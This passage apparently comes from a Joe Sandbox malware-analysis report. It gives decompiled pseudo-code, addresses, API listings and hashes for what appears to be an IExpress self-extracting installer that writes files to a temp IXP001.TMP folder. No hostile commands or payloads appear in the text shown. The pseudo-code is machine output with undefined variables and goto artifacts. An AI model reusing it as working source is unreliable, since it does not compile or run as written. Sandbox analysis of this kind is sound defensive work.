                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                        												GlobalUnlock(_t103);
                                                                        											} else {
                                                                        												goto L15;
                                                                        											}
                                                                        										} else {
                                                                        											goto L15;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L20;
                                                                        					}
                                                                        				}
                                                                        				L20:
                                                                        				 *_a8 = _t87;
                                                                        				if(_t103 != 0) {
                                                                        					GlobalFree(_t103);
                                                                        				}
                                                                        				return _t106;
                                                                        			}

































                                                                        0x00f328f1
                                                                        0x00f328f4
                                                                        0x00f328f7
                                                                        0x00f328f9
                                                                        0x00f328fc
                                                                        0x00f328ff
                                                                        0x00f32901
                                                                        0x00f32907
                                                                        0x00f32a62
                                                                        0x00f32a64
                                                                        0x00f3290d
                                                                        0x00f3290d
                                                                        0x00f3290f
                                                                        0x00f32912
                                                                        0x00f32920
                                                                        0x00f32937
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f32944
                                                                        0x00f3294a
                                                                        0x00f3294f
                                                                        0x00f32a2f
                                                                        0x00f32a32
                                                                        0x00f32a34
                                                                        0x00f32a37
                                                                        0x00f32a41
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f32955
                                                                        0x00f3295e
                                                                        0x00f32962
                                                                        0x00f32969
                                                                        0x00f3296f
                                                                        0x00f32974
                                                                        0x00f3298c
                                                                        0x00f32a20
                                                                        0x00f32a21
                                                                        0x00f32a27
                                                                        0x00f32a4c
                                                                        0x00f32a4f
                                                                        0x00f32a50
                                                                        0x00f32a53
                                                                        0x00f32a56
                                                                        0x00f32a5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f329b2
                                                                        0x00f329b2
                                                                        0x00f329b5
                                                                        0x00f329bd
                                                                        0x00f329c3
                                                                        0x00f329cc
                                                                        0x00f329d5
                                                                        0x00f329d7
                                                                        0x00f329da
                                                                        0x00f329dd
                                                                        0x00f329df
                                                                        0x00f329ec
                                                                        0x00f329f8
                                                                        0x00f329fc
                                                                        0x00f329ff
                                                                        0x00f32a02
                                                                        0x00f32a07
                                                                        0x00f32a0a
                                                                        0x00f32a0f
                                                                        0x00f32a19
                                                                        0x00f32a81
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f32a0f
                                                                        0x00f3298c
                                                                        0x00f32974
                                                                        0x00f32962
                                                                        0x00000000
                                                                        0x00f3294f
                                                                        0x00f32912
                                                                        0x00f32a65
                                                                        0x00f32a68
                                                                        0x00f32a6c
                                                                        0x00f32a6f
                                                                        0x00f32a6f
                                                                        0x00f32a7d

                                                                        APIs
                                                                        • GlobalFree.KERNEL32 ref: 00F32A6F
                                                                          • Part of subcall function 00F32773: CharUpperA.USER32(C69E30F7,00000000,00000000,00000000), ref: 00F327A8
                                                                          • Part of subcall function 00F32773: CharNextA.USER32(0000054D), ref: 00F327B5
                                                                          • Part of subcall function 00F32773: CharNextA.USER32(00000000), ref: 00F327BC
                                                                          • Part of subcall function 00F32773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32829
                                                                          • Part of subcall function 00F32773: RegQueryValueExA.ADVAPI32(?,00F31140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32852
                                                                          • Part of subcall function 00F32773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32870
                                                                          • Part of subcall function 00F32773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F328A0
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00F33938,?,?,?,?,-00000005), ref: 00F32958
                                                                        • GlobalLock.KERNEL32 ref: 00F32969
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F33938,?,?,?,?,-00000005,?), ref: 00F32A21
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00F32A81
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                        • String ID:
                                                                        • API String ID: 3949799724-0
                                                                        • Opcode ID: 8dcb1495fe283f90c93e9f990bb48bfc8374acac39bab9090ca914ddae34293c
                                                                        • Instruction ID: 3cf54ea0a16650743b760287e6e5bc53ccf68882d884222939324757a8bd1f35
                                                                        • Opcode Fuzzy Hash: 8dcb1495fe283f90c93e9f990bb48bfc8374acac39bab9090ca914ddae34293c
                                                                        • Instruction Fuzzy Hash: 17512971E00219DBCF65CF99C884AAEBBB6FF48720F14406AE945E3211DB399941EB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 32%
                                                                        			E00F34169(void* __eflags) {
                                                                        				int _t18;
                                                                        				void* _t21;
                                                                        
                                                                        				_t20 = E00F3468F("FINISHMSG", 0, 0);
                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                        				if(_t21 != 0) {
                                                                        					if(E00F3468F("FINISHMSG", _t21, _t20) != 0) {
                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                        							L7:
                                                                        							return LocalFree(_t21);
                                                                        						}
                                                                        						_push(0);
                                                                        						_push(0x40);
                                                                        						_push(0);
                                                                        						_push(_t21);
                                                                        						_t18 = 0x3e9;
                                                                        						L6:
                                                                        						E00F344B9(0, _t18);
                                                                        						goto L7;
                                                                        					}
                                                                        					_push(0);
                                                                        					_push(0x10);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_t18 = 0x4b1;
                                                                        					goto L6;
                                                                        				}
                                                                        				return E00F344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        			}





                                                                        0x00f3417d
                                                                        0x00f3418f
                                                                        0x00f34193
                                                                        0x00f341b7
                                                                        0x00f341d3
                                                                        0x00f341e6
                                                                        0x00000000
                                                                        0x00f341e7
                                                                        0x00f341d5
                                                                        0x00f341d6
                                                                        0x00f341d8
                                                                        0x00f341d9
                                                                        0x00f341da
                                                                        0x00f341df
                                                                        0x00f341e1
                                                                        0x00000000
                                                                        0x00f341e1
                                                                        0x00f341b9
                                                                        0x00f341ba
                                                                        0x00f341bc
                                                                        0x00f341bd
                                                                        0x00f341be
                                                                        0x00000000
                                                                        0x00f341be
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                          • Part of subcall function 00F3468F: SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                          • Part of subcall function 00F3468F: LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                          • Part of subcall function 00F3468F: LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                          • Part of subcall function 00F3468F: memcpy_s.MSVCRT ref: 00F346E5
                                                                          • Part of subcall function 00F3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00F330B4), ref: 00F34189
                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00F330B4), ref: 00F341E7
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$FINISHMSG
                                                                        • API String ID: 3507850446-3091758298
                                                                        • Opcode ID: 4fac9aeca0aaf22f4dd336ce0e7f37a2ca48d1b33cf31494ca1189f7675f5395
                                                                        • Instruction ID: 6d9d6f15c6b6db05c5c949562f0d8fc2736b05d7fe39d489b298bda61101bcdb
                                                                        • Opcode Fuzzy Hash: 4fac9aeca0aaf22f4dd336ce0e7f37a2ca48d1b33cf31494ca1189f7675f5395
                                                                        • Instruction Fuzzy Hash: FB01F4F27006183BF3252A668C86F7B718EEBD57B5F104035BB46E12809AACFC417175
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F319E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v520;
                                                                        				void* __esi;
                                                                        				signed int _t11;
                                                                        				void* _t14;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				void* _t33;
                                                                        				struct HWND__* _t34;
                                                                        				signed int _t35;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t27 = __ebx;
                                                                        				_t11 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t11 ^ _t35;
                                                                        				_t34 = _a4;
                                                                        				_t14 = _a8 - 0x110;
                                                                        				if(_t14 == 0) {
                                                                        					_t32 = GetDesktopWindow();
                                                                        					E00F343D0(_t34, _t15);
                                                                        					_v520 = 0;
                                                                        					LoadStringA( *0xf39a3c, _a16,  &_v520, 0x200);
                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                        					MessageBeep(0xffffffff);
                                                                        					goto L6;
                                                                        				} else {
                                                                        					if(_t14 != 1) {
                                                                        						L4:
                                                                        						_t23 = 0;
                                                                        					} else {
                                                                        						_t32 = _a12;
                                                                        						if(_t32 - 0x83d > 1) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							EndDialog(_t34, _t32);
                                                                        							L6:
                                                                        							_t23 = 1;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00F36CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                        			}













                                                                        0x00f319e0
                                                                        0x00f319e0
                                                                        0x00f319eb
                                                                        0x00f319f2
                                                                        0x00f319f9
                                                                        0x00f319fc
                                                                        0x00f31a01
                                                                        0x00f31a2a
                                                                        0x00f31a2e
                                                                        0x00f31a3e
                                                                        0x00f31a4f
                                                                        0x00f31a62
                                                                        0x00f31a6a
                                                                        0x00000000
                                                                        0x00f31a03
                                                                        0x00f31a06
                                                                        0x00f31a20
                                                                        0x00f31a20
                                                                        0x00f31a08
                                                                        0x00f31a08
                                                                        0x00f31a14
                                                                        0x00000000
                                                                        0x00f31a16
                                                                        0x00f31a18
                                                                        0x00f31a70
                                                                        0x00f31a72
                                                                        0x00f31a72
                                                                        0x00f31a14
                                                                        0x00f31a06
                                                                        0x00f31a81

                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 00F31A18
                                                                        • GetDesktopWindow.USER32 ref: 00F31A24
                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00F31A4F
                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00F31A62
                                                                        • MessageBeep.USER32(000000FF), ref: 00F31A6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1273765764-0
                                                                        • Opcode ID: 03e414487aba4d402a1ab002c2152bba56e203c27274e5baa7289b5cd88324b5
                                                                        • Instruction ID: efcf637ae5848fd39d183197885b4b818d583f8fecc8c0f62e2d068e40e35d60
                                                                        • Opcode Fuzzy Hash: 03e414487aba4d402a1ab002c2152bba56e203c27274e5baa7289b5cd88324b5
                                                                        • Instruction Fuzzy Hash: A6118E3160110DABDB10EF64DD08AAE77B9FB49331F108154F96292190DA34AE05FB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F37155() {
                                                                        				void* _v8;
                                                                        				struct _FILETIME _v16;
                                                                        				signed int _v20;
                                                                        				union _LARGE_INTEGER _v24;
                                                                        				signed int _t23;
                                                                        				signed int _t36;
                                                                        				signed int _t37;
                                                                        				signed int _t39;
                                                                        
                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                        				_t23 =  *0xf38004; // 0xc69e30f7
                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                        					QueryPerformanceCounter( &_v24);
                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                        					_t39 = _t36;
                                                                        					if(_t36 == 0xbb40e64e || ( *0xf38004 & 0xffff0000) == 0) {
                                                                        						_t36 = 0xbb40e64f;
                                                                        						_t39 = 0xbb40e64f;
                                                                        					}
                                                                        					 *0xf38004 = _t39;
                                                                        				}
                                                                        				_t37 =  !_t36;
                                                                        				 *0xf38008 = _t37;
                                                                        				return _t37;
                                                                        			}











                                                                        0x00f3715d
                                                                        0x00f37161
                                                                        0x00f37165
                                                                        0x00f37178
                                                                        0x00f37182
                                                                        0x00f3718e
                                                                        0x00f37197
                                                                        0x00f371a0
                                                                        0x00f371b1
                                                                        0x00f371b8
                                                                        0x00f371c4
                                                                        0x00f371c7
                                                                        0x00f371cb
                                                                        0x00f371d5
                                                                        0x00f371da
                                                                        0x00f371da
                                                                        0x00f371dc
                                                                        0x00f371dc
                                                                        0x00f371e2
                                                                        0x00f371e5
                                                                        0x00f371ee

                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F37182
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00F37191
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F3719A
                                                                        • GetTickCount.KERNEL32 ref: 00F371A3
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00F371B8
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                        • String ID:
                                                                        • API String ID: 1445889803-0
                                                                        • Opcode ID: c2add5da002b23f833a8bf87187821a002d2e1348694aed626d04ec63efc5573
                                                                        • Instruction ID: b83a07e1c1fe719fa03c56f62997d400f98aaf6f7bcb3da6d3dd2bdac7a899dd
                                                                        • Opcode Fuzzy Hash: c2add5da002b23f833a8bf87187821a002d2e1348694aed626d04ec63efc5573
                                                                        • Instruction Fuzzy Hash: C1113AB1D0520CDBCB14EFB9DA48A9EB7F6EF18320F614855E801E7214EA349A05AF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E00F363C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				long _v272;
                                                                        				void* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t15;
                                                                        				long _t28;
                                                                        				struct _OVERLAPPED* _t37;
                                                                        				void* _t39;
                                                                        				signed int _t40;
                                                                        
                                                                        				_t15 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t15 ^ _t40;
                                                                        				_v272 = _v272 & 0x00000000;
                                                                        				_push(__ecx);
                                                                        				_v276 = _a16;
                                                                        				_t37 = 1;
                                                                        				E00F31781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        				E00F3658A( &_v268, 0x104, _a12);
                                                                        				_t28 = 0;
                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                        				if(_t39 != 0xffffffff) {
                                                                        					_t28 = _a4;
                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                        						 *0xf39124 = 0x80070052;
                                                                        						_t37 = 0;
                                                                        					}
                                                                        					CloseHandle(_t39);
                                                                        				} else {
                                                                        					 *0xf39124 = 0x80070052;
                                                                        					_t37 = 0;
                                                                        				}
                                                                        				return E00F36CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                        			}















                                                                        0x00f363cb
                                                                        0x00f363d2
                                                                        0x00f363d8
                                                                        0x00f363ea
                                                                        0x00f363f3
                                                                        0x00f36401
                                                                        0x00f36402
                                                                        0x00f36410
                                                                        0x00f36415
                                                                        0x00f36433
                                                                        0x00f36438
                                                                        0x00f36449
                                                                        0x00f36463
                                                                        0x00f3646d
                                                                        0x00f36477
                                                                        0x00f36477
                                                                        0x00f3647a
                                                                        0x00f3643a
                                                                        0x00f3643a
                                                                        0x00f36444
                                                                        0x00f36444
                                                                        0x00f36492

                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F3642D
                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F3645B
                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F3647A
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F363EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleWrite
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 1065093856-3217841213
                                                                        • Opcode ID: 80463fcbe71e98566b03b57057f8ab7770044f23a2786a930d73ee9f83f386c0
                                                                        • Instruction ID: e89ed1848dc151bfa92c3dcccfb2c403ad848615199fb6954ec776aae804b200
                                                                        • Opcode Fuzzy Hash: 80463fcbe71e98566b03b57057f8ab7770044f23a2786a930d73ee9f83f386c0
                                                                        • Instruction Fuzzy Hash: D221C0B1A0021CABDB10DF25DC85FEA7769EB44334F0041A9F585A3280DAB49D85AFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F347E0(intOrPtr* __ecx) {
                                                                        				intOrPtr _t6;
                                                                        				intOrPtr _t9;
                                                                        				void* _t11;
                                                                        				void* _t19;
                                                                        				intOrPtr* _t22;
                                                                        				void _t24;
                                                                        				struct HWND__* _t25;
                                                                        				struct HWND__* _t26;
                                                                        				void* _t27;
                                                                        				intOrPtr* _t28;
                                                                        				intOrPtr* _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t33 = __ecx;
                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                        				if(_t34 != 0) {
                                                                        					_t22 = _t33;
                                                                        					_t27 = _t22 + 1;
                                                                        					do {
                                                                        						_t6 =  *_t22;
                                                                        						_t22 = _t22 + 1;
                                                                        					} while (_t6 != 0);
                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                        					 *_t34 = _t24;
                                                                        					if(_t24 != 0) {
                                                                        						_t28 = _t33;
                                                                        						_t19 = _t28 + 1;
                                                                        						do {
                                                                        							_t9 =  *_t28;
                                                                        							_t28 = _t28 + 1;
                                                                        						} while (_t9 != 0);
                                                                        						E00F31680(_t24, _t28 - _t19 + 1, _t33);
                                                                        						_t11 =  *0xf391e0; // 0x9c7c60
                                                                        						 *(_t34 + 4) = _t11;
                                                                        						 *0xf391e0 = _t34;
                                                                        						return 1;
                                                                        					}
                                                                        					_t25 =  *0xf38584; // 0x0
                                                                        					E00F344B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                        					LocalFree(_t34);
                                                                        					L2:
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 =  *0xf38584; // 0x0
                                                                        				E00F344B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                        				goto L2;
                                                                        			}















                                                                        0x00f347e8
                                                                        0x00f347f0
                                                                        0x00f347f4
                                                                        0x00f3480f
                                                                        0x00f34811
                                                                        0x00f34814
                                                                        0x00f34814
                                                                        0x00f34816
                                                                        0x00f34817
                                                                        0x00f34829
                                                                        0x00f3482b
                                                                        0x00f3482f
                                                                        0x00f3484f
                                                                        0x00f34852
                                                                        0x00f34855
                                                                        0x00f34855
                                                                        0x00f34857
                                                                        0x00f34858
                                                                        0x00f34860
                                                                        0x00f34865
                                                                        0x00f3486a
                                                                        0x00f3486f
                                                                        0x00000000
                                                                        0x00f34876
                                                                        0x00f34831
                                                                        0x00f34841
                                                                        0x00f34847
                                                                        0x00f3480b
                                                                        0x00000000
                                                                        0x00f3480b
                                                                        0x00f347f6
                                                                        0x00f34806
                                                                        0x00000000

                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00F34E6F), ref: 00F347EA
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00F34823
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00F34847
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F34851
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 359063898-3217841213
                                                                        • Opcode ID: caaadd5bd8d88c0bac67f38abb3bdddb2096d279500ce1382d1867ac62133933
                                                                        • Instruction ID: c71de26d5a91f559f99577efe8e8b92475220b735cc6a7664ba3ca6e712d138c
                                                                        • Opcode Fuzzy Hash: caaadd5bd8d88c0bac67f38abb3bdddb2096d279500ce1382d1867ac62133933
                                                                        • Instruction Fuzzy Hash: 701125B5A047416FD7149F249C18F763B5BEB85370F048519FE829B381DA79FC06AA60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F33680(void* __ecx) {
                                                                        				void* _v8;
                                                                        				struct tagMSG _v36;
                                                                        				int _t8;
                                                                        				struct HWND__* _t16;
                                                                        
                                                                        				_v8 = __ecx;
                                                                        				_t16 = 0;
                                                                        				while(1) {
                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                        					if(_t8 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                        						continue;
                                                                        					} else {
                                                                        						do {
                                                                        							if(_v36.message != 0x12) {
                                                                        								DispatchMessageA( &_v36);
                                                                        							} else {
                                                                        								_t16 = 1;
                                                                        							}
                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                        						} while (_t8 != 0);
                                                                        						if(_t16 == 0) {
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				return _t8;
                                                                        			}







                                                                        0x00f3368c
                                                                        0x00f3368f
                                                                        0x00f33691
                                                                        0x00f3369f
                                                                        0x00f336a7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f336ba
                                                                        0x00000000
                                                                        0x00f336bc
                                                                        0x00f336bc
                                                                        0x00f336c0
                                                                        0x00f336cb
                                                                        0x00f336c2
                                                                        0x00f336c4
                                                                        0x00f336c4
                                                                        0x00f336da
                                                                        0x00f336e0
                                                                        0x00f336e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f336e6
                                                                        0x00000000
                                                                        0x00f336ba
                                                                        0x00f336ed

                                                                        APIs
                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00F3369F
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F336B2
                                                                        • DispatchMessageA.USER32(?), ref: 00F336CB
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F336DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
